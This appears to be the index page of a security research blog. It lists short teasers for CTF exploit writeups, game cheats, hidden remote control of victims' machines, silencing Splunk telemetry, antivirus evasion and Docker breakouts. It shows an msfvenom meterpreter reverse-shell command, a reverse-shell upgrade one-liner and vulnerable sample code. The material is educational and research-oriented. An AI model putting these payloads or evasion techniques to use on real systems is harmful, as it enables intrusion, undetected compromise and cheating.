BananaMafia

Automotive Security Research

Mon, 01 Jan 0001 00:00:00 +0000

Awesome Talks

Mon, 01 Jan 0001 00:00:00 +0000

Bananabot: CS:GO Multihack

Mon, 01 Jan 0001 00:00:00 +0000

CANalyzat0r

Mon, 01 Jan 0001 00:00:00 +0000

Please find CANalyzat0r here on GitHub :)

Crypt0r

Mon, 01 Jan 0001 00:00:00 +0000

Dockerfiles

Mon, 01 Jan 0001 00:00:00 +0000

haxxor-tools

Mon, 01 Jan 0001 00:00:00 +0000

Linux Containers Research

Mon, 01 Jan 0001 00:00:00 +0000

mitm-fuzz0r

Mon, 01 Jan 0001 00:00:00 +0000

Official Cutter Docker Configuration

Mon, 01 Jan 0001 00:00:00 +0000

pwntools-r2

Mon, 01 Jan 0001 00:00:00 +0000

Q3 Engine Multihack

Mon, 01 Jan 0001 00:00:00 +0000

RandomJK

Mon, 01 Jan 0001 00:00:00 +0000

Reinschauer

Mon, 01 Jan 0001 00:00:00 +0000

Game Hacking #6: Cheating on Console with Lua

Wed, 22 Oct 2025 00:00:00 +0000

Cheating in PS2 Games with Lua

After jailbreaking my PS4, I searched for a way to play some PS2 games on it. Since HDMI ports are not available on stock PS2s, the obvious solution would be to emulate the games on a PS4.

Years ago, the PS4 homebrew community already found ways to emulate many PS2 games on the console. The main method involves an emulator that was originally developed for the game Jak and Daxter called Jak v2. This emulator can be repurposed to emulate many other PS2 titles on the PS4. This can be done manually with some effort, but the tool PS2FPKG already handles all of the hard stuff. Only a game ISO is required for it to generate a package that is ready to be installed on a jailbroken PS4.

37C3 CTF: ezrop

Sun, 31 Dec 2023 00:00:00 +0000

This is a writeup for the 37C3 CTF challenge ezrop with the following description: Pretty standard ret2libc pwn challenge.. A binary with partial RELRO, no PIC and no canary was given, along with the libc that’s deployed on the target server. This writeup shows how to solve the challenge using r2 and pwntools-r2.

Triggering the buffer overflow vulnerability is straight forward: Passing a long string causes a segmentation fault in the function vuln(). This function calls printf() for a prompt and then proceeds to read input using gets() into a buffer that’s too small. Next, an information leak of a libc address is required to move forward. Only few ROP gadgets exist and the plan is to somehow call system() with /bin/sh as argument. To predict the address of system(), the information leak is required.

BinaryGolf 2023: Building A GameBoy-Bash Polyglot

Wed, 13 Sep 2023 00:00:00 +0000

In the BinaryGolf competition, specific file related problems have to be solved with the least amount of bytes. This was the challenge for the 2023 edition:

Me and some other guy decided to go for a GameBoy ROM with an embedded bash script, since old file formats like game ROMs are quite interesting. In the end, we came up with such a polyglot file that met all criteria of the challenge and was 397 bytes in size. This is a short demo of it:

ShhPlunk: Muting the Splunk Forwarder

Mon, 15 May 2023 00:00:00 +0000

Many organizations rely on Splunk and its Splunk Forwarder to deliver event data as a sole source of telemetry. For quite some time, I’ve wondered if it’s possible to mute the Splunk Forwarder’s splunkd process, so that no event data reaches the respective endpoint. Technically, this should be possible, once the required privileges are granted on a system. Therefore, I’ve decided to take a look at this. While Splunk Forwarder is available for various platforms, I’ve targeted the Linux version. This means that you need permissions to ptrace the splunkd process to be able to do any modifications.

Game Hacking #5: Hacking Walls and Particles

Sun, 23 Apr 2023 00:00:00 +0000

Hello fellow Wallhackers, NoSmokers and Copy-Pasters. Today, I’ll write about implementing several cool cheat features for your favorite game, CS:GO. There may be many articles like this, but this one is mine :)

First, of all I recommend checking out my previous posts covering several aspects and internals of CS:GO before reading this. I’ve got posts about Aimbots and NoFlash, as well as Direct3D hooks that will serve as a basis for this post.

Reinschauer: Remotely Controlling Windows Machines

Tue, 27 Sep 2022 00:00:00 +0000

Recently, I did some research on Hidden VNCs (HVNC). This is a neat feature for attackers to have, since it allows to remotely control a compromised system on a new and separate virtual desktop that is not visible to the victim. This way, it is possible to remotely launch and use GUI programs without generating any visual indicators for victims.

Implementing HVNC is complicated. First of all, you need to be able to grab the screen contents of the hidden desktop. On Windows, there are no APIs available to do this easily. You can only take screenshots of the default desktop, which is the one a potential victim is operating on. You rather have to use something like EnumDesktopWindows() to get a list of windows present on the hidden desktop and use another API call to get the window contents. In case that works: Great. But sometimes it just doesn’t because some developer didn’t care about implementing the functionality required to grab screen contents (WM_PRINT, for example). On top of that, you have to do all of that in the correct order, since windows are often layered on top of each other. Sending input to a specific window is quite another thing: On the regular desktop you can just use SendInput() and coordinates to simulate a click. On a hidden desktop, this API cannot be used as well. It is required to check what kind of GUI element a user clicks on, e.g. a close button, and send the correct message to the correct window. So, you ultimately have to implement your own window manager. Coooooooool :/

Game Hacking #4: Cheating in Unity Games

Mon, 09 May 2022 00:00:00 +0000

Yo!

Do you know the game Among Us ? It’s a multiplayer game where you have to identify impostors in a group of players. The impostor’s goal is to kill every other player without being identified throughout the game. The remaining players can use votes to kick out a specific player, while hopefully identifying the impostor correctly.

The game is based on the Unity engine and, along with other platforms, it is available for Android devices. I’ve looked into the game and I thought it would be a great idea to identify the impostors right away and without having to guess. Let’s see how that can be done with Frida.

This Weird YouTube Trick

Sat, 30 Apr 2022 00:00:00 +0000

A while ago, I’ve found an article on Hackaday, describing how to stream arbitrary YouTube videos to Sonos systems. Before you ask: No, that’s not possible normally, at least not without a premium subscription.

In the original article called How I hacked SONOS and YouTube the same day (lol?????), the author described an approach to grab audio streams from YouTube and to convert them into ADTS streams on-the-fly to convince a Sonos device to play some YouTube music. For this, an MP3 radio station is created that Sonos uses as a source, all without the requirement to first download a video to disk and then streaming it to Sonos afterwards. Some parts seem rather complicated, such as manually parsing MP4 containers to extract AAC audio content. Also, there’s another issue: The author still didn’t release the full source code and also did not (yet?) release the announced mobile app to perform these tasks.

Advanced Painless Tofu – APT

Fri, 23 Jul 2021 00:00:00 +0000

Props to kawaiicon for the illustrations.

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Tue, 06 Jul 2021 00:00:00 +0000

There’s no good way to start a blog post like this, so let’s dive right in:

Recently, I’ve re-discovered the butthax talk which covered security aspects of Lovense devices. I’ve felt so inspired, that I’ve decided to buy some Satisfyer devices and check out how they work.

These are app-controllable toys that are sold globally, first and foremost in Germany and all over the EU. They have some pretty interesting functionality:

Control the device via Bluetooth using an Android app. According to the description it’s a sexual joy and wellness app like no other. o_O
Create an account, find new friends and exchange messages and images. Given the nature of this app, it’s quite interesting that Google Play allows everyone above 13 to download and use this app. Well OK.
Start remote sessions and allow random dudes from the Internet or your friends to control the Satisfyer.
Perform software updates.

Throughout this post, I’ll shed some light on how various aspects of some of these features work. Most importantly, I’ve found an authentication bypass vulnerability that can result in an account takeover. This would have allowed me to forge authentication tokens for every user of the application.

Command Injection in LaTeX Workshop

Sat, 27 Feb 2021 00:00:00 +0000

Welcome to another round of Banana tweets and unintentionally makes people mad.

I’ve had a look at some VS Code extensions that make use of shell commands with the goal to find a command injection vulnerability. For this, I’ve grepped for child_process, since this is a NodeJS API that’s commonly used to execute shell commands in VS Code.

I’ve quickly found various extensions that make use of this API. A vulnerability exists in case:

Haxxoring a Hisense Smart TV

Mon, 15 Feb 2021 00:00:00 +0000

Instead of watching The Bachelor, I’ve decided to take a look at the security of my Hisense smart TV. I’ve found a way to read arbitrary files from the file system. Also, (over)writing specific files, as well as installing malicious HTML5 applications was found to be possible. All of that can be performed from the web browser, using the custom JavaScript API that was implemented by the vendor.

You can find some PoCs at the end of this blog post. As a bonus, you can visit this blog post with a Hisense TV and check if the device is affected or not.

Building a Cloudless UniFi Security System That Doesn't Suck

Mon, 25 Jan 2021 00:00:00 +0000

If you’re like me (rich), it’s likely that you want to monitor and protect your ice and gold chainz with technical measures. Since cloud based solutions are not an option for me, I’ve built a system that’s self-hosted. It’s based on my existing UniFi network setup, a UniFi camera and this software:

UniFi Controller: This is used to manage all UniFi devices in a network.
UniFi Network Video Recorder (NVR): This is a controller and video recording manager for UniFi cameras.

All of this can be self-hosted without requiring any cloud connections. In fact, you can add some firewall rules to prevent any outbound connections and it will still work as expected.

Does This Syncthing Work?

Wed, 20 Jan 2021 00:00:00 +0000

OK, so syncthing is cool for automatic synchronization and backups and all of that stuff. But there are also times when you open the web UI and notice that no data transfer has happened within the last two months. Nice!

This is often caused by faulty run conditions that can be set in the app or network errors. The syncthing server may also have some trouble, too. I’ve decided to create a little bot with the goal to monitor sync progress and to send out alerts in case of failure. I’m using a Telegram bot to get notified. In a previous post, I’ve described how to create such a Telegram bot.

Game Hacking #3: Hooking Direct3D EndScene()

Thu, 04 Jun 2020 00:00:00 +0000

I’ve experimented with even moar game hacking and hooking techniques and you didn’t, so here comes another blog post.

Today’s topic is about hooking a specific function of the Direct3D library with the goal to cause Counter Strike: Global Offensive to draw additional things on the screen. There can be various reasons to do this:

It’s possible to draw a crosshair on the screen when none is shown by the game. This allows players to 360 NoScope all the enemies without zooming in first
Show additional information on the screen, for example an enemy’s health or the equipped weapon
Also: Because why not

Overview

The function we want to hook is called EndScene(). It’s being called to queue an already existing scene for output. In the context of this blog post a scene is equivalent to a frame and you can therefore say that EndScene() is called once for each frame. Since this function is being executed after a specific scene has been put together, it’s an ideal function to hook when adding additional content to the screen.

SROP Exploitation with radare2

Sat, 11 Apr 2020 00:00:00 +0000

Recently I’ve discovered a paper that demonstrates a fancy ROP-style exploitation technique for Linux based systems. It’s called Sigreturn-oriented programming (SROP) and was released by two dudes of the Vrije Universiteit Amsterdam in 2014. This post contains background information on this exploitation technique and shows how to pull it off using radare2 and pwntools.

Sigreturn-Oriented Programming

The cool thing about this technique is that only one or two gadgets are required in order to get control over all registers of the target process. Two preconditions have to be met:

MemLabs: An Introduction To Memory Forensics

Mon, 23 Mar 2020 00:00:00 +0000

Since you’re all isolated, grumpy and bored I’ve decided to create a little introduction to memory forensics. The test subject is the first stage of MemLabs, a set of CTF challenges focused on memory forensics by @_abhiramkumar. Each stage has its own memory dump that was taken from a live system using a tool like DumpIt. The goal for the first stage of MemLabs is to obtain all three flags.

Since we’re hip and cool, we’re using free and open source software for the analysis tasks. A very convenient and powerful tool for memory forensics is volatility. It’s a Python based memory forensics framework for all kinds of memory analyses - just have a look at the huge list of available analysis commands. It’s under active development by the Volatility Foundation, which has shared some introductory words in the wiki. Before you ask - yes it supports Windows, Linux and OSX memory dumps.

Fuzzing A GameBoy Emulator With AFL++

Fri, 21 Feb 2020 00:00:00 +0000

Recently I’ve started a little fuzzing project. After doing some research, I’ve decided to fuzz a gaming emulator. The target of choice is a GameBoy and GameBoy Advance emulator called VisualBoyAdvance-M, which is also called VBA-M. At the time of writing the emulator was still being maintained. VBA-M seems to be a fork of VisualBoyAdvance, for which development seems to have stopped in 2006.

Disclaimer: I’m publishing this blog post to share some fuzzing methodology and tooling and not to blame the developers. I’ve previously reported all my fuzzing discoveries to the developer team of VBA-M on GitHub.

Exploiting A Use-After-Free With radare2 - CTF Challenge

Wed, 15 Jan 2020 00:00:00 +0000

This writeup is about a 36C3 junior CTF challenge called minifd which can be found here. The goal is to find and exploit a user-after-free vulnerability in order to spawn a shell on the remote system. Here’s the challenge description:

This is a simple file manager implementation supporting basic functionality to create, read, and write files.

Please note: This is a prototype implementation. At this point of time, only 16 files can be managed at the same time.

36C3 CTF Writeups

Mon, 30 Dec 2019 00:00:00 +0000

1337 skills

Task description:

It’s too hard to gain all 1337 h4x0r skills required by nowadays CTFs ._.! I am glad a friendly hacker told me about an App he got during a (growth) hacking course. Sadly, he didn’t wrote down any activations codes.

Ready for your hacking exam?

As can be read above, an Android app was given at the beginning of the challenge, with the hint to get a valid activation code for it.

Open Redirects In State Parameters

Tue, 17 Dec 2019 00:00:00 +0000

Now that the deadline to fix this vulnerability has passed, I’ve decided to publish this blog post that covers a web vulnerability I’ve found in the login mechanism of a particular company.

Everything started when I had a look at a more complex part of a public web application of this vendor. The web application that gives out a link to the user that can be used to open up the same user state again at a later point. I’ve then opened this link from a private tab and examined the web requests in the Burp proxy.

ROP on ARM with radare2

Tue, 19 Nov 2019 00:00:00 +0000

Exploit development on ARM with radare2 seems like a great idea until you start searching for resources, searching for a nice and automated debugging setup. Here’s what I’ve found:

nothing

Cool. That’s the reason why this post covers the setup I came up with, as well as basics for ROP on the ARM architecture. The exploit target is stack6 from Azeria Labs and radare2 will be used as a debugger. If you’re a beginner I suggest reading the ARM assembly basics on the same site first before starting the challenges from the beginning with stack0. The exploitation techniques covered in this post are ROP, ret2plt and ret2libc.

In-Process Fuzzing With Frida

Thu, 24 Oct 2019 00:00:00 +0000

In a previous post I’ve already covered Frida and its instrumentation abilities. But check this out: You can also use Frida to perform fuzzing. What’s even greater is that Frida allows in-process fuzzing.

Why would you want to do this? There may be various reasons, but the most outstanding one for me is building a fuzzing harness for closed source applications and libraries. Just take Counter Strike GO as an example:

If you want to fuzz the map loading routines with maximum speed, you’d (ideally) want to create a minimized environment that only performs the map loading. Now the CS:GO client is a graphical application that performs all kinds of stuff when being launched and it’s not scriptable to an extent that allows efficient fuzzing. To avoid executing all this code that’s not even related to map loading, a fuzzing harness is required. A great example of such a harness for CS:GO can be found here - the harness consists of a custom wrapper and some patches.

How I Over-Engineered My Dotfiles

Wed, 16 Oct 2019 00:00:00 +0000

You want to customize your Linux dotfiles, whether you already know it or not. After investing way too much time into this, I’ve decided to share some results and tricks in this blog post.

General Structure

The first thing to do is to create a general structure for your dotfiles and all associated files and scripts. I came up with this structure:

dotfiles
├── aliases
├── bashrc
├── bindings: Additional key bindings
├── exports: Shell-wide exports
├── i3: Config and bar for i3 window manager
│   ├── config
│   ├── polybar
│   └── scripts
├── Makefile: Generate readme and call shellcheck on push
[...]
├── nanorc
├── README.md
├── secrets-*
│   ├── stuff
├── termite: Terminal emulator config
├── tmux.conf
├── vimrc
└── zshrc

This whole structure can then be managed in a git repository. Using a dotfile manager like yadm makes it easy to deploy the dotfiles on a system. My own approach involves using Ansible as you will see at the end of this post. Using this, it becomes possible to deploy the same public dotfiles repository on various systems while maintaining a separate private repository for system-specific configuration values. These “secret” values can be absolute file system paths that you don’t want to expose on GitHub or in a public repository at all. All of these values are stored in the secrets-* folders. Of course you shouldn’t just go and store your keys in there, there are better ways to do this – for example using Ansible Vault.

How Not To Suck At r2wars

Tue, 01 Oct 2019 00:00:00 +0000

As every year at r2con, the r2wars competition was hosted by sanguinawer and the r2 overlord pancake. I’ve made it to the second place in this year’s battles, so I’ve promised to create a writeup for my participation – and here it is. Welcome to the nerdiest game in town.

Lol What’s r2wars Again?

The r2wars competition is based on radare2’s ESIL (Evaluable Strings Intermediate Language) engine. It’s normally used to emulate instructions of various architectures during reverse engineering. It’s definitely a useful feature of radare2 and you can find more information here if you want to get started using it.

Dynamic Instrumentation: Frida And r2frida For Noobs

Fri, 13 Sep 2019 00:00:00 +0000

One of my main takeaways from this year’s r2con is that Frida is cool and that r2frida, the integration with radare2, is even cooler. Using this, it’s possible to pair the benefits of dynamic instrumentation of Frida with the analysis features and workflow of radare2. This is a small tutorial to get started with both Frida and r2frida that’s based on the r2xor challenge of the recent r2con CTF. Please note that this is not a complete writeup for r2xor.

r2con 2019 CTF Writeups

Mon, 02 Sep 2019 00:00:00 +0000

r2boy1

The first GameBoy challenge was rather easy. The idea was to talk to the Pancake character in-game in order to get the flag. The problem is that Pancake chills behind a wall. One possible solution was to glitch through the wall, however I’ve solved this using static analysis.

Going through the strings and searching for a possible dialog yields interesting strings:

[0x00054075]> izzq~pancake
0x54016 37 36 Find pancake\nthrough a game\nglitch!
0x5403c 30 29 I am pancake, the\nr2 prophet.

Inspecting this region directly yields the flag in plain text:

ROP On x64: What's ret2csu Again?

Thu, 29 Aug 2019 00:00:00 +0000

Based on the Stop, ROP, n’, Roll challenge from this year’s Redpwn CTF, this post will explain how to make system calls on x64 using ROP in order to spawn a shell. Also, it shows how to abuse writable memory regions of a process to overcome difficulties with some ROP gadgets. And the best thing is, two of the gadgets used in this writeup are universal and most likely also present in your x64 target if it’s using glibc. Of course, everything will be done with radare2 and pwntools.

Reversing .NET Applications: CCCamp19 CTF CampRE Challenge

Sun, 25 Aug 2019 00:00:00 +0000

Finally a nice .NET CTF challenge - time to pull out dnSpy :)

The provided ZIP includes a CampRE.dll file which, according to the challenge description, is a .NET Core application. Time to boot a Windows VM and install the .NET Core runtime environment.

After decompiling the dll, this source code can be inspected:

private static void Main(string[] args)
{
    byte[] sourceArray = File.ReadAllBytes(Assembly.GetAssembly(typeof(Program)).Location);
    for (int i = 0; i < 1333337; i++)
    {
        MD5 md = MD5.Create();
        byte[] bytes = Encoding.ASCII.GetBytes("i=" + i.ToString());
        byte[] array = md.ComputeHash(bytes);
        MD5 md2 = MD5.Create();
        byte[] bytes2 = Encoding.ASCII.GetBytes("i1337=" + i.ToString());
        byte[] sourceArray2 = md2.ComputeHash(bytes2);
        byte[] destinationArray = new byte[32];
        Array.Copy(array, 0, destinationArray, 0, 16);
        Array.Copy(sourceArray2, 0, destinationArray, 16, 16);
        byte[] array2 = new byte[16];
        MD5 md3 = MD5.Create();
        byte[] array3 = new byte[10];
        Array.Copy(sourceArray, 4432, array3, 0, 10);
        byte[] sourceArray3 = md3.ComputeHash(array3);
        Array.Copy(sourceArray3, 0, array2, 0, 16);
        try
        {
            global::Aes aes = new global::Aes(array, array2);
            byte[] rawAssembly = aes.DecryptFromBase64StringAsByte(Program.toDecrypt);
            MethodInfo entryPoint = Assembly.Load(rawAssembly).EntryPoint;
            entryPoint.Invoke(null, new object[]
            {
                new string[] { "NOT_A_BADBOY" }
            });
        }
        catch (Exception ex) {}
    }
}

It seems that the application brute-forces the AES key for an embedded Base64 string in memory and tries to execute it as a binary afterwards. The first thing I did was modifying the dll with dnSpy in order to dump the decrypted binary to a local file:

Exploiting PHP Deserialization: CCCamp19 CTF PDFCreator Challenge

Sat, 24 Aug 2019 00:00:00 +0000

Deserialization is a vulnerability class that’s often overlooked. It’s great that this year’s CCCamp CTF included an interesting web based challenge that is based on this vulnerability class.

The Target

The challenge includes a link to a web service that allows converting user-supplied images into PDF files. Users can upload image files, add some additional HTML content in a textbox and render the whole thing into a PDF file:

A ZIP file with the source code of the web application is also available.

ROP It Like It's Hot: ROP Basics - Stack Pivoting

Tue, 13 Aug 2019 00:00:00 +0000

Let’s check out Return Oriented Programming (ROP) with the pivot32 challenge from ROP Emporium by using radare2. The pivot32 binary is compiled without stack canaries and PIE but has NX enabled.

Basics

The general principle behind ROP is that:

[…] an attacker gains control of the call stack to hijack program control flow and then executes carefully chosen machine instruction sequences that are already present in the machine’s memory, called “gadgets”.[2] Each gadget typically ends in a return instruction and is located in a subroutine within the existing program and/or shared library code. Chained together, these gadgets allow an attacker to perform arbitrary operations on a machine employing defenses that thwart simpler attacks.

CryptoCTF 2019 Writeup: Decode Me

Sun, 11 Aug 2019 00:00:00 +0000

This is short writeup on the Decode Me challenge of the first CryptoCTF.

The following string has to be decoded into a flag somehow:

D: mb xwhvxw mlnX 4X6AhPLAR4eupSRJ6FLt8AgE6JsLdBRxq57L8IeMyBRHp6IGsmgFIB5E :ztey xam lb lbaH

The first thing that comes to mind is that some sort of substitution cipher was being used in the first place. A cipher of this kind is the Caesar cipher which is also known as ROT. Fiddling around with this cipher and a key of 7 yields:

Brute-Forcing x86 Stack Canaries

Thu, 08 Aug 2019 00:00:00 +0000

And now for something more CTF-y: Dealing with stack canaries by brute-forcing their value byte by byte.

How Stack Canaries Work

If you’ve ever read the error message *** stack smashing detected ***: <...> terminated, you’ve already encountered stack canaries in action. They are being used to detect and stop buffer overflows by placing a per-process randomized value between the local variables and the saved return address. If an attacker somehow manages to write across the boundary of a buffer in order to overwrite the saved return address, he will also overwrite the canary. The program will check whether the canary is still intact prior to returning from a function and aborts in case it has been altered. This causes the vulnerable application to never actually load the overwritten return address into the instruction pointer because it terminates instead. The following animation shows a successful canary check and a failed one - keep an eye on the EAX register which holds the result of the canary check. If it’s all zeroes, the check has succeeded. In every other case the application will not skip the call sym.__stack_chk_fail_local instruction after the check, which causes the application to terminate:

r2con 2019 PwnDebian Challenge: Exploiting radare2 (CVE-2019-14745, CVE-2019-16718)

Tue, 30 Jul 2019 00:00:00 +0000

Hello hello!

Everyone knows: This years r2con, the conference about radare2, has a very special challenge – PwnDebian:

The almighty blenk92 and me decided to assist the radare2 project in finding such an exploit an we think we were quite successful :)

But first some basics for r2.

Shelling Out Via The r2 Shell

While running r2, it’s possible to shell out and execute shell commands without leaving the r2 console:

Buffer Overflows on x64 with radare2

Sat, 13 Jul 2019 00:00:00 +0000

The approach to exploit buffer overflows on x64 is a bit different that on x86. This post demonstrates this using the split challenge of ROP Emporium while making use of radare2.

RIP & Canonical Addresses

The first thing one notices when trying to gain control over the instruction pointer is that only values of a specific range are allowed to be loaded into the RIP register. On x86 arbitrary values can be loaded into the instruction pointer register (EIP) - on x64 only canonical values are allowed. These are values of the following ranges:

Game Hacking #2: Coding A CS:GO Hack

Wed, 19 Jun 2019 00:00:00 +0000

This post covers creating a hack for the game Counter Strike: Global Offensive. The hack I’ve developed works in combination with the Linux version of the game - coding a windows-based hack can however be done with the same methodology and tools.

These are the features I’ve integrated into the hack:

Bunnyhop Bot: Do jumps as soon as the player hits the ground to make it easier to perform bunny hop chains
No Flash: Be immune to flash grenades that would block the players vision
Aimbot: Automatically aim at the head of the nearest enemy

Tooling & Setup

Linux lacks of good tools to perform the kind of analysis tasks required to code a cheat like this. There are pince and scanmem available but they only provide a limited set of the required features. In the Windows world, there’s handy tool called Cheat Engine that is capable of all the required tasks, like:

Bypassing ASLR and DEP for 32-Bit Binaries With r2

Wed, 01 May 2019 00:00:00 +0000

This post covers basic basics of bypassing ASLR and DEP with r2. For this, a vulnerable application, yolo.c, is required:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void lol(char *b)
{
    char buffer[1337];
    strcpy(buffer, b);
}

int main(int argc, char **argv)
{
    lol(argv[1]);
}

64-Bit vs 32-Bit Binaries

The issue here should be quite obvious - strcpy blindly copies the user-controlled input buffer b into buffer which causes a buffer overflow. Since normally ASLR and DEP are enabled, the following things don’t just work out of the box:

Information Leak in Docker

Fri, 04 Jan 2019 00:00:00 +0000

During an assessment of the Docker platform in November 2018, two information leaks regarding the /proc/asound path were discovered in the OCI (Open Container Initiative) specification. These issues have been fixed quickly by the Docker security team using the provided suggestions.

Leak of audio device status of the host

When media is being played on the host, the

/proc/asound/card*/pcm*p/sub*/status

files may contain information regarding the status of media playback. Consider this command for a demonstration:

Passing binary input via GDB

Fri, 26 Oct 2018 00:00:00 +0000

When trying to exploit an application it’s useful to send the input via gdb to immediately check how the input is being processed. But once the gdb is open it’s sometimes not clear how to pass binary input to applications reading from stdin, e.g. using read. An easy way is to start the debugging session with gdb ./binary and using

run < <(printf "\xAA\xAA\xAA")

from the gdb session to send arbitrary bytes.

Car Hacking: A Short Overview

Tue, 23 Oct 2018 00:00:00 +0000

Ever wondered about the various techniques that can be applied to hack modern cars? This post documents various ways to do so - you can use it as a cheatsheet

Software

There are multiple ways one can interface with the software stack of a car. The easiest one is to use USB-to-Ethernet adapters in order to attach to the network of the car. It’s important to use special adapters that are whitelisted on the car’s head unit. Also, not every adapter may be supported after all. For this, it’s best to do some research to get a hold of the right devices to use. Once attached to the network, assign a static IP to the interface. Once again it’s up to the researcher to get the correct IP range. For a specific car manufacturer, it seems to be 192.168.0.0 according to KeenLab [1]. It’s best to test all IP ranges not being publicly routed. Now, use some nmap to scan for services.

Game Hacking #1: Developing Hacks for idTech3 Based Games

Tue, 28 Aug 2018 00:00:00 +0000

The idTech3 game engine is most known for being used in games like Quake III Arena, Wolfenstein: ET and Star Wars: Jedi Knight - Jedi Academy. Sometimes people just simply refer to this engine as the Quake3 engine. This post teaches you how to create hacks for games that are based on this game engine. The target of choice is the game Jedi Academy, which was released in 2003. Oldschool, I know - but most of the injection and hooking techniques can also be applied to modern games.

Game Hacking #0: Runtime Function Patching

Thu, 16 Aug 2018 00:00:00 +0000

When it comes to patching certain functions of a binary on ASM level, it’s often performed by modifying the binary itself. This post shows a different approach to accomplish the same thing: Removing game cheat protections using runtime function patching.

The Target

This is being shown in the following context: Quake3 based multiplayer games include certain settings (CVars) which are disabled for players to prevent cheating. These settings would enable clients to disable fog and shadows and use different camera angles. Using these settings would bring an advantage over clients not being able to use them, hence the protection mechanism. However, it would be convenient to use these settings anyway and remove the protection mechanism on the client side – that’s what function patching is being used for.

Backup Google Authenticator Data

Wed, 20 Jun 2018 00:00:00 +0000

Using 2 factor authentication generally is a good idea. However, losing 2 factor data can be the opposite. If you’re using Google Authenticator to generate 2FA codes, you may have wondered how to backup the data the app uses to generate codes. The method described here requires root access of course but doesn’t require a third party app. Please note that you can always use apps that backup app data but recovering this data on newer Android versions can fail. To avoid this, use this script:

Docker Breakout Using X11

Fri, 18 May 2018 00:00:00 +0000

Use Docker to run GUI applications they said.

Mount the X11 socket they said.

Allow other users to access your X session they said.

This post covers Docker container breakouts by abusing bad security practices related to the X11 socket.

The problem

To display windows spawned through a Docker container, people often launch containers following these steps:

Use -e DISPLAY=$DISPLAY to share the display variable value
Specifying -v /tmp/.X11-unix:/tmp/.X11-unix:ro shares the X11 socket - optionally as read only.
“I can’t see the window, let’s google…”
“Let’s just execute xhost +local:root and it works!”

The X11 socket is mounted as read only - it’s secure right?

Methods to Upgrade nc Reverse Shells

Wed, 16 May 2018 00:00:00 +0000

Ended up with a cheap nc shell and want to upgrade to a “real” shell with a proper TTY and navigation?

Say no more <:

1. Upgrading using shell magic

This doesn’t always work - however if Python is present on the victims machine, it’s worth a try.

Use bash on the attacker machine, zsh doesn’t seem to work.
Get the nc shell.
In the shell, execute:

python -c 'import pty; pty.spawn("/bin/sh")'

to allocate a TTY in the nc session.

2 Common Python Security Issues

Sun, 13 May 2018 00:00:00 +0000

tl;dr

Be aware that imports can be hijacked for Python2 and Python3 - take care of EUIDs.

Don’t use input() for Python2.x.

Module Hijacking

When assigning SUID bits to Python scripts, privileges can be escalated easily. Consider the following Python source code:

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-

import hashlib

value = raw_input()

md5 = hashlib.md5()
md5.update(value)
print md5.digest()

Note that in case of SUID binaries this code runs as root. Attacker controlled code can be injected by hijacking the hashlib module as follows:

Cracking Music Server Software

Sun, 13 May 2018 00:00:00 +0000

tl;dr

Generating licenses using MD5(email) is bad.

Validating licenses using HTTP in plain text is bad.

The Software

This post covers reverse engineering and cracking the license validation process of a popular and closed source self hosted music server application. The developer has been notified about the findings, however no reply has been received. The validation issues still exist as of now and affects all issued licenses. Because of this, the name of the application won’t be disclosed.

Easy Remote Pair Programming Using Docker and Tmux

Tue, 10 Apr 2018 00:00:00 +0000

Recently I’ve created a small docker container to perform remote pair programming. Shared shell sessions are an easy way to remotely interact with coworkers or other people. With additional docker magic you now don’t even have to give them access to your host system - they will be contained just like you and the work that’s being done. Using my docker image, it’s possible to share a tmux session with a group of people. You can check out the readme over at GitHub which should be fairly easy to understand.

Using the GitHub API to improve Dockerfiles

Tue, 20 Mar 2018 00:00:00 +0000

When writing Dockerfiles, people often use something like this to download and install software from GitHub:

ENV SOFTWARE_VERSION 1.33.7
RUN curl -sSL \
    https://github.com/user/repo/releases/download/${SOFTWARE_VERSION}/amd64.deb

This can be optimized so that always the newest version gets used, which also simplifies maintaining the Dockerfile because updating happens automatically:

curl -sSL \
   $(curl -sSL https://api.github.com/repos/user/repo/releases/latest | \
   grep "browser_download_url" | \
   grep "amd64.deb" | \
   cut -d ":" -f 2,3 | \
   tr --delete \" | \
   tr --delete " ") \
-o /tmp/software-amd64.deb \

As you can see, the endpoint at

A Quick Survey on Anti-Anti-Viruses

Fri, 16 Mar 2018 00:00:00 +0000

tl;dr

AVs can easily be bypassed using malware AES crypters like Crypt0r:

Open Source Evasion Techniques

All of the following results are based on a meterpreter file which was generated like this:

msfvenom
  -p windows/meterpreter/reverse_tcp
  --platform windows
  -f exe
  LHOST=192.168.1.1
  LPORT=1337
  -o meter.exe

All scans are performed on VirusTotal. Please not that this covers static analysis only. However, it will become clear later on that dynamic analysis of the used techniques aren’t required at all.

Monitor All the Things using Docker and Monit

Fri, 16 Mar 2018 00:00:00 +0000

After setting up 329423 services and 823423 containers, you might want to manage your environment in case some service fails. This can be automated restarting, getting notified about failures or a similar thing. Say no more, I’ve created a Dockerfile and image for Monit for this.

Monit is extremely configurable and allows a maximum of flexibility when it comes to monitoring.

Initially, a configuration file is required to get started. To get one, call

Exploiting Unquoted Service Paths For Fun and No Profit

Thu, 15 Mar 2018 00:00:00 +0000

This kind of vulnerability is really old. However, vendors still fail to properly address this issue. This is just another example of exploiting this kind of vulnerability on Windows 10 with the most up-to-date ALFA AWUS036AC driver utility (version 1030.6). Note that the download link points to alfa.com but the driver utility itself says it’s developed by REALTEK.

The vulnerability

Upon installing the driver utility, two vulnerable services get installed. This can be checked using the following command:

Easy and Secure Backups Using Borg and Docker

Wed, 14 Mar 2018 00:00:00 +0000

BorgBackup is a secure backup solution which is also easy to use. It provides compression, encryption, deduplication and authentication.

Getting started

I’ve created a Dockerfile based on Alpine Linux which is also available on DockerHub. It gets built weekly to always stay up to date.

This Makefile can be used to quickly get started using a containerized version of Borg:

SHELL := /bin/bash
VERSION ?= latest

# The directory of this file
DIR := $(shell echo $(shell cd "$(shell  dirname "${BASH_SOURCE[0]}" )" && pwd ))

IMAGE_NAME ?= ps1337/borg-docker
CONTAINER_NAME ?= borg

# This will output the help for each task
# thanks to https://marmelab.com/blog/2016/02/29/auto-documented-makefile.html
.PHONY: help

help: ## This help
	@awk 'BEGIN {FS = ":.*?## "} /^[a-zA-Z_-]+:.*?## / {printf "\033[36m%-30s\033[0m %s\n", $$1, $$2}' $(MAKEFILE_LIST)

.DEFAULT_GOAL := help

# Build the container
build: ## Build the container
	docker build --rm -t $(IMAGE_NAME) .

build-nc: ## Build the container without caching
	docker build --rm --no-cache -t $(IMAGE_NAME) .

run: ## Run container
	sudo docker run \
	-d \
